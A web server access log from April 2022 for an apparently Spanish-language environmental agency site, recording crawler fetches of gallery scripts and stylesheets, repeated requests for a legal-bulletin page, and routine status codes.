172.22.2.4 - - [24/Apr/2022:06:24:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
173.252.127.11 - - [24/Apr/2022:06:26:04 -0500] "GET /pacto-por-la-madera-legal-gobernanza-forestal-el-camino-para-la-sostenibilidad.html HTTP/1.1" 206 1051
216.245.221.92 - - [24/Apr/2022:06:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:29:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:29:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
31.148.130.149 - - [24/Apr/2022:06:31:34 -0500] "GET /BLA/resoluciones/AUTOS%202018/2018.pdf HTTP/1.1" 200 254194
66.249.65.13 - - [24/Apr/2022:06:32:46 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:06:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:06:32:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44307
201.245.192.253 - - [24/Apr/2022:06:33:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45653
157.55.39.145 - - [24/Apr/2022:06:36:21 -0500] "GET /Residuos/maderas/maderas.html HTTP/1.1" 200 1957
103.195.103.32 - - [24/Apr/2022:06:36:24 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:06:34:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.115 - - [24/Apr/2022:06:36:50 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
207.46.13.115 - - [24/Apr/2022:06:36:53 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
207.46.13.196 - - [24/Apr/2022:06:36:53 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
40.77.167.29 - - [24/Apr/2022:06:36:58 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
172.22.2.4 - - [24/Apr/2022:06:35:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [24/Apr/2022:06:37:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:39:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
98.109.141.152 - - [24/Apr/2022:06:40:38 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [24/Apr/2022:06:41:16 -0500] "-" 408 -
89.187.182.24 - - [24/Apr/2022:06:42:03 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
172.22.2.4 - - [24/Apr/2022:06:40:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.94.104.95 - - [24/Apr/2022:06:42:47 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
216.245.221.92 - - [24/Apr/2022:06:42:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:06:42:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44307
172.22.2.4 - - [24/Apr/2022:06:41:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [24/Apr/2022:06:43:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45653
172.22.2.4 - - [24/Apr/2022:06:45:24 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Apr/2022:06:45:25 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2013%20del%2006%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 200 351421
157.55.39.199 - - [24/Apr/2022:06:46:48 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
157.55.39.199 - - [24/Apr/2022:06:46:50 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
157.55.39.145 - - [24/Apr/2022:06:46:52 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
207.46.13.82 - - [24/Apr/2022:06:46:55 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
157.55.39.145 - - [24/Apr/2022:06:46:55 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
207.46.13.82 - - [24/Apr/2022:06:46:57 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
157.55.39.145 - - [24/Apr/2022:06:46:58 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.167.29 - - [24/Apr/2022:06:46:59 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
157.55.39.145 - - [24/Apr/2022:06:47:01 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
40.77.167.29 - - [24/Apr/2022:06:47:02 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.167.29 - - [24/Apr/2022:06:47:05 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.167.29 - - [24/Apr/2022:06:47:08 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.167.29 - - [24/Apr/2022:06:47:11 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.167.29 - - [24/Apr/2022:06:47:14 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
216.245.221.92 - - [24/Apr/2022:06:47:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:46:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:47:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [24/Apr/2022:06:52:50 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.4 - - [24/Apr/2022:06:53:15 -0500] "GET /distrito-firma-acuerdos-de-conservacion-con-academia-y-sociedad-civil-para-proteger-22-hectareas-en-suba-y-cerros-orientales.html HTTP/1.1" 206 1062
172.22.2.4 - - [24/Apr/2022:06:52:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:53:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
